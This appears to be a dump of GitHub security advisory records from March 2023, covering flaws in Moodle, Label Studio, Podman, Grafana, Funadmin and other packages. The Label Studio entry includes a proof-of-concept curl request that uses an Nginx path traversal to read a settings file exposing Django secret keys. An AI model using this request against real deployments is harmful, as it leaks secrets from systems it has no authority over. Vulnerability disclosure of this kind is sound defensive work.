[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36392'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424797'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:57:45Z', 'nvd_published_at': '2023-03-06T21:15:00Z'}
|
1.4.0
|
GHSA-cpmr-mw4j-99r7
|
2023-03-24T22:04:02Z
|
2023-03-24T22:04:02Z
| null |
[]
|
Nginx alias path traversal allows unauthenticated attackers to read all files on /label_studio/core/
|
### Summary
The vulnerability resides on the Nginx config file:
https://github.com/heartexlabs/label-studio/blob/53944e6bcede75ca5c102d655013f2e5238e85e6/deploy/default.conf#L119
The pattern on location /static indicates a popular misconfiguration on Nginx servers presented in 2018 originally by Orange Tsai. This vulnerability allows an attacker to use a single path traversal payload in the matched location to traverse one directory above. This vulnerability only happens due to the location /static directive not having a slash `/` at the end, the following code shows an example of a safe configuration:
```nginx
location /static/ {
[...]
```
The vulnerability works because Nginx will think that `/static../` is a directory that should also be aliased to the folder, allowing /static/../ to be reached. In Label Studio's case, this means all files on /label_studio/core/ are exposed.
Of course, this means that only Label Studio instances that were deployed using the default nginx files introducted at Mar 31, 2021.
This is a very easy vulnerability to fix, and just a lesser-known configuration mistake on nginx files. It's very easy to happen because all is needed is for one slash to be missing. (Off-By-One)
** Proof-of-Concept (Leaking Secret Keys): **
Exploiting this vulnerability usually depends on what's on the parent folder, in Label Studio's case the most interesting file I could find that's on there by default is /label_studio/core/ . We can fetch it by simply making a request to the traversed folder.
```bash
# Production Label Studio docker-compose running on localhost:8080
/t/mydata [127]$ curl localhost:8080/static../settings/label_studio.py
"""This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import os
import pathlib
from core.settings.base import *
DJANGO_DB = get_env('DJANGO_DB', DJANGO_DB_SQLITE)
DATABASES = {'default': DATABASES_ALL[DJANGO_DB]}
MIDDLEWARE.append('organizations.middleware.DummyGetSessionMiddleware')
MIDDLEWARE.append('core.middleware.UpdateLastActivityMiddleware')
if INACTIVITY_SESSION_TIMEOUT_ENABLED:
MIDDLEWARE.append('core.middleware.InactivitySessionTimeoutMiddleWare')
ADD_DEFAULT_ML_BACKENDS = False
LOGGING['root']['level'] = get_env('LOG_LEVEL', 'WARNING')
DEBUG = get_bool_env('DEBUG', False)
DEBUG_PROPAGATE_EXCEPTIONS = get_bool_env('DEBUG_PROPAGATE_EXCEPTIONS', False)
SESSION_COOKIE_SECURE = False
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
RQ_QUEUES = {}
SENTRY_DSN = get_env(
'SENTRY_DSN',
'https://[email protected]/5820521'
)
SENTRY_ENVIRONMENT = get_env('SENTRY_ENVIRONMENT', 'opensource')
FRONTEND_SENTRY_DSN = get_env(
'FRONTEND_SENTRY_DSN',
'https://[email protected]/5838868')
FRONTEND_SENTRY_ENVIRONMENT = get_env('FRONTEND_SENTRY_ENVIRONMENT', 'opensource')
EDITOR_KEYMAP = json.dumps(get_env("EDITOR_KEYMAP"))
from label_studio import __version__
from label_studio.core.utils import sentry
sentry.init_sentry(release_name='label-studio', release_version=__version__)
# we should do it after sentry init
from label_studio.core.utils.common import collect_versions
versions = collect_versions()
# in Label Studio Community version, feature flags are always ON
FEATURE_FLAGS_DEFAULT_VALUE = True
# or if file is not set, default is using offline mode
FEATURE_FLAGS_OFFLINE = get_bool_env('FEATURE_FLAGS_OFFLINE', True)
from core.utils.io import find_file
FEATURE_FLAGS_FILE = get_env('FEATURE_FLAGS_FILE', 'feature_flags.json')
FEATURE_FLAGS_FROM_FILE = True
try:
from core.utils.io import find_node
find_node('label_studio', FEATURE_FLAGS_FILE, 'file')
except IOError:
FEATURE_FLAGS_FROM_FILE = False
STORAGE_PERSISTENCE = get_bool_env('STORAGE_PERSISTENCE', True)
```
### Impact
The impact consists on leaking Django secret keys by default, with also greater risk being possible due to the vulnerability exposing the file located at /label_studio/core/settings/label_studio.py which contains the secret key for Django as well as possibly containing other secrets the user might put there. (If the administrator decides not to use environment variables for some variables)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'label-studio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/heartexlabs/label-studio/security/advisories/GHSA-cpmr-mw4j-99r7'}, {'type': 'PACKAGE', 'url': 'https://github.com/heartexlabs/label-studio'}, {'type': 'WEB', 'url': 'https://github.com/heartexlabs/label-studio/blob/53944e6bcede75ca5c102d655013f2e5238e85e6/deploy/default.conf#L119'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:04:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qwqv-rqgf-8qh8
|
2023-04-04T15:30:26Z
|
2023-03-27T21:30:26Z
| null |
['CVE-2023-0778']
|
Podman Time-of-check Time-of-use (TOCTOU) Race Condition
|
A Time-of-check Time-of-use (TOCTOU) flaw was found in podman. This issue may allow a malicious user to replace a normal file in a volume with a symlink while exporting the volume, allowing for access to arbitrary files on the host file system.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/podman/v4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0778'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/pull/17528'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/pull/17532'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/commit/6ca857feb07a5fdc96fd947afef03916291673d8'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-0778'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2168256'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-qwqv-rqgf-8qh8'}, {'type': 'PACKAGE', 'url': 'https://github.com/containers/podman'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1681'}]
|
{'cwe_ids': ['CWE-367'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T22:33:20Z', 'nvd_published_at': '2023-03-27T21:15:00Z'}
|
1.4.0
|
GHSA-c5vj-f36q-p9vg
|
2023-03-23T16:25:01Z
|
2023-03-13T20:51:07Z
| null |
['CVE-2023-27580']
|
Password Shucking Vulnerability
|
### Impact
An improper implementation was found in the password storage process.
All hashed passwords stored in Shield v1.0.0-beta.3 or earlier are easier to crack than expected due to the vulnerability. Therefore, they should be removed as soon as possible.
If an attacker gets (1) the user's hashed password by Shield, and (2) the hashed password (SHA-384 hash without salt) from somewhere, the attacker may easily crack the user's password.
### Patches
Upgrade to Shield v1.0.0-beta.4 or later.
After upgrading, all users’ hashed passwords should be updated (saved to the database).
See https://github.com/codeigniter4/shield/blob/develop/UPGRADING.md for details.
### Workarounds
None.
### References
- https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pre-hashing-passwords
- https://blog.ircmaxell.com/2015/03/security-issue-combining-bcrypt-with.html
- https://www.scottbrady91.com/authentication/beware-of-password-shucking
### For more information
If you have any questions or comments about this advisory:
* Open an issue or discussion in [codeigniter4/shield](https://github.com/codeigniter4/shield)
* Email us at [[email protected]](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'codeigniter4/shield'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-beta.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/codeigniter4/shield/security/advisories/GHSA-c5vj-f36q-p9vg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27580'}, {'type': 'WEB', 'url': 'https://github.com/codeigniter4/shield/commit/ea9688dd01d100193d834117dbfc2cfabcf9ea0b'}, {'type': 'WEB', 'url': 'https://blog.ircmaxell.com/2015/03/security-issue-combining-bcrypt-with.html'}, {'type': 'WEB', 'url': 'https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pre-hashing-passwords'}, {'type': 'PACKAGE', 'url': 'https://github.com/codeigniter4/shield'}, {'type': 'WEB', 'url': 'https://github.com/codeigniter4/shield/blob/develop/UPGRADING.md'}, {'type': 'WEB', 'url': 'https://www.scottbrady91.com/authentication/beware-of-password-shucking'}]
|
{'cwe_ids': ['CWE-916'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:51:07Z', 'nvd_published_at': '2023-03-13T18:15:00Z'}
|
1.4.0
|
GHSA-56r9-72vx-q989
|
2023-03-28T02:24:32Z
|
2023-03-23T21:30:18Z
| null |
['CVE-2023-28330']
|
Moodle arbitrary file read vulnerability
|
Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28330'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/493205b6b280633bcbc49d2eaf4f61a52252c26c'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-77204'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/3QZN34VSF4HTCW3C3ZP2OZYSLYUKADPF/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445062'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:08:49Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-4jpv-8r57-pv7j
|
2023-03-13T15:29:39Z
|
2023-03-06T06:30:18Z
| null |
['CVE-2023-26108']
|
@nestjs/core vulnerable to Information Exposure via StreamableFile pipe
|
Versions of the package @nestjs/core before 9.0.5 are vulnerable to Information Exposure via the StreamableFile pipe. Exploiting this vulnerability is possible when the client cancels a request while it is streaming a StreamableFile, the stream wrapped by the StreamableFile will be kept open.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@nestjs/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26108'}, {'type': 'WEB', 'url': 'https://github.com/nestjs/nest/issues/9759'}, {'type': 'WEB', 'url': 'https://github.com/nestjs/nest/pull/9819'}, {'type': 'WEB', 'url': 'https://github.com/nestjs/nest/pull/9819/commits/f59cf5e81ca73bcdf1b5b36713550fd93918db41'}, {'type': 'PACKAGE', 'url': 'https://github.com/nestjs/nest'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-NESTJSCORE-2869127'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T00:10:01Z', 'nvd_published_at': '2023-03-06T05:15:00Z'}
|
1.4.0
|
GHSA-9qvw-fhj2-xqmv
|
2023-03-17T16:59:07Z
|
2023-03-13T09:30:39Z
| null |
['CVE-2023-1367']
|
Code Injection in alextselegidis/easyappointments
|
Code Injection in GitHub repository alextselegidis/easyappointments prior to 1.5.0 due to unescaped output.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'alextselegidis/easyappointments'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1367'}, {'type': 'WEB', 'url': 'https://github.com/alextselegidis/easyappointments/commit/453c6e130229718680c91bef450db643a0f263e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/alextselegidis/easyappointments'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/16bc74e2-1825-451f-bff7-bfdc1ea75cc2'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:43:54Z', 'nvd_published_at': '2023-03-13T09:15:00Z'}
|
1.4.0
|
GHSA-9wf9-qvvp-2929
|
2023-03-14T21:34:18Z
|
2023-03-09T00:30:18Z
| null |
['CVE-2023-1283']
|
builderio/qwik is vulnerable to code injection
|
Code Injection in GitHub repository builderio/qwik prior to 0.21.0. The Function deserializer can be accessed using the pureServerFunction feature. This allows any Javascript code to be run by node.js.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@builder.io/qwik'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1283'}, {'type': 'WEB', 'url': 'https://github.com/builderio/qwik/commit/4d9ba6e098ae6e537aa55abb6b8369bb670ffe66'}, {'type': 'PACKAGE', 'url': 'https://github.com/BuilderIO/qwik'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-10T22:28:41Z', 'nvd_published_at': '2023-03-08T22:15:00Z'}
|
1.4.0
|
GHSA-6mmf-qm37-pmgg
|
2023-03-31T17:16:48Z
|
2023-03-29T18:30:29Z
|
2023-03-31T17:16:48Z
|
[]
|
Duplicate Advisory: Pimcore vulnerable to Reflected XSS in Predefined Properties module in Settings
|
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of [GHSA-7r35-chv4-xr3r](https://github.com/advisories/GHSA-7r35-chv4-xr3r). This link is maintained ot preserve external references.
## Original Description
Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.5.20.
|
[]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1701'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/2b997737dd6a60be2239a51dd6d9ef5881568e6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/64f943c4-68e5-4ef8-82f6-9c4abe928256'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:59:10Z', 'nvd_published_at': '2023-03-29T16:15:00Z'}
|
1.4.0
|
GHSA-8hqf-xjwp-p67v
|
2023-03-28T23:08:31Z
|
2023-03-28T14:40:29Z
| null |
['CVE-2023-28626']
|
Comrak vulnerable to quadratic runtime issues when parsing Markdown (GHSL-2023-047)
|
### Impact
A range of quadratic parsing issues from `cmark`/`cmark-gfm` are also present in Comrak. These can be used to craft denial-of-service attacks on services that use Comrak to parse Markdown.
### Patches
0.17.0 contains fixes to known quadratic parsing issues.
### Workarounds
n/a
### References
* https://github.com/commonmark/cmark/issues/255
* https://github.com/commonmark/cmark/issues/389
* https://github.com/commonmark/cmark/issues/373
* https://github.com/commonmark/cmark/issues/299
* https://github.com/commonmark/cmark/issues/388
* https://github.com/commonmark/cmark/issues/284
* https://github.com/commonmark/cmark/issues/218
* https://github.com/commonmark/cmark/pull/232
* https://github.com/github/cmark-gfm/blob/c32ef78bae851cb83b7ad52d0fbff880acdcd44a/test/pathological_tests.py#L63-L65
* https://github.com/github/cmark-gfm/blob/c32ef78bae851cb83b7ad52d0fbff880acdcd44a/test/pathological_tests.py#L87-L89
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'comrak'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/security/advisories/GHSA-8hqf-xjwp-p67v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28626'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/218'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/255'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/284'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/299'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/373'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/388'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/issues/389'}, {'type': 'WEB', 'url': 'https://github.com/commonmark/cmark/pull/232'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/commit/ce795b7f471b01589f842dc09af38b025701178d'}, {'type': 'WEB', 'url': 'https://github.com/github/cmark-gfm/blob/c32ef78bae851cb83b7ad52d0fbff880acdcd44a/test/pathological_tests.py#L63-L65'}, {'type': 'WEB', 'url': 'https://github.com/github/cmark-gfm/blob/c32ef78bae851cb83b7ad52d0fbff880acdcd44a/test/pathological_tests.py#L87-L89'}, {'type': 'PACKAGE', 'url': 'https://github.com/kivikakk/comrak'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/releases/tag/0.17.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/OUYME2VA555X6567H7ORIJQFN4BVGT6N/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/PTWZWCT7KCX2KTXTLPUYZ3EHOONG4X46/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/VQ3UBC7LE4VPCMZBTADIBL353CH7CPVV/'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-28T14:40:29Z', 'nvd_published_at': '2023-03-28T21:15:00Z'}
|
1.4.0
|
GHSA-p4qx-6w5p-4rj2
|
2023-04-03T20:55:06Z
|
2023-03-27T03:30:16Z
| null |
['CVE-2023-28867']
|
GraphQL Java vulnerable to stack consumption
|
In GraphQL Java (aka graphql-java) before 20.1, an attacker can send a crafted GraphQL query that causes stack consumption. The fixed versions are 20.1, 19.4, 18.4, 17.5, and 0.0.0-2023-03-20T01-49-44-80e3135.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.graphql-java:graphql-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-2023-03-20T01-49-44-80e3135'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.graphql-java:graphql-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2'}, {'fixed': '17.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.graphql-java:graphql-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '18.0'}, {'fixed': '18.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.graphql-java:graphql-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.0'}, {'fixed': '19.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.graphql-java:graphql-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0'}, {'fixed': '20.1'}]}], 'versions': ['20.0']}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28867'}, {'type': 'WEB', 'url': 'https://github.com/graphql-java/graphql-java/pull/3112'}, {'type': 'PACKAGE', 'url': 'https://github.com/graphql-java/graphql-java'}, {'type': 'WEB', 'url': 'https://github.com/graphql-java/graphql-java/releases/tag/v17.5'}, {'type': 'WEB', 'url': 'https://github.com/graphql-java/graphql-java/releases/tag/v18.4'}, {'type': 'WEB', 'url': 'https://github.com/graphql-java/graphql-java/releases/tag/v19.4'}, {'type': 'WEB', 'url': 'https://github.com/graphql-java/graphql-java/releases/tag/v20.1'}]
|
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T21:22:36Z', 'nvd_published_at': '2023-03-27T01:15:00Z'}
|
1.4.0
|
GHSA-qxpm-5ghc-6gc2
|
2023-03-13T15:26:54Z
|
2023-03-06T18:30:22Z
| null |
['CVE-2023-24789']
|
jeecg-boot contains SQL Injection vulnerability
|
jeecg-boot v3.4.4 was discovered to contain an authenticated SQL injection vulnerability via the building block report component.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.4.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24789'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4511'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:55:18Z', 'nvd_published_at': '2023-03-06T16:15:00Z'}
|
1.4.0
|
GHSA-xc93-587g-mxm7
|
2023-04-10T16:38:33Z
|
2023-03-30T21:30:21Z
| null |
['CVE-2023-28462']
|
Payara Server allows remote attackers to load malicious code on the server once a JNDI directory scan is performed
|
A JNDI rebind operation in the default ORB listener in Payara Server 4.1.2.191 (Enterprise), 5.20.0 and newer (Enterprise), and 5.2020.1 and newer (Community), when Java 1.8u181 and earlier is used, allows remote attackers to load malicious code on the server once a JNDI directory scan is performed.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'fish.payara.server:payara-aggregator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2020.1'}, {'fixed': '6.2022.1.Alpha3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28462'}, {'type': 'WEB', 'url': 'https://blog.payara.fish/vulnerability-affecting-server-environments-on-java-1.8-on-updates-lower-than-1.8u191'}, {'type': 'PACKAGE', 'url': 'https://github.com/payara/Payara'}]
|
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-10T16:38:33Z', 'nvd_published_at': '2023-03-30T20:15:00Z'}
|
1.4.0
|
GHSA-m8wf-wmwh-jw2m
|
2023-03-14T22:52:59Z
|
2023-03-08T18:30:26Z
| null |
['CVE-2023-24773']
|
SQL Injection in Funadmin
|
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24773'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/funadmin/funadmin'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T22:52:59Z', 'nvd_published_at': '2023-03-08T16:15:00Z'}
|
1.4.0
|
GHSA-7g53-jj25-jhgr
|
2023-03-14T17:59:01Z
|
2023-03-06T21:30:18Z
| null |
['CVE-2023-24776']
|
Remote code execution in Funadmin
|
Funadmin v3.2.0 was discovered to contain a remote code execution (RCE) vulnerability via the component \controller\Addon.php.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24776'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/7'}, {'type': 'PACKAGE', 'url': 'https://github.com/funadmin/funadmin'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T17:59:01Z', 'nvd_published_at': '2023-03-06T20:15:00Z'}
|
1.4.0
|
GHSA-xw5p-hw8j-xg4q
|
2023-03-09T04:23:30Z
|
2023-03-01T18:30:59Z
| null |
['CVE-2023-0594']
|
Grafana vulnerable to Cross-site Scripting
|
Grafana is an open-source platform for monitoring and observability. Starting with the 7.0 branch, Grafana had a stored XSS vulnerability in the trace view visualization. The stored XSS vulnerability was possible due the value of a span's attributes/resources were not properly sanitized and this will be rendered when the span's attributes/resources are expanded. An attacker needs to have the Editor role in order to change the value of a trace view visualization to contain JavaScript. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. Users may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '8.5.21'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0594'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-0594/'}]
|
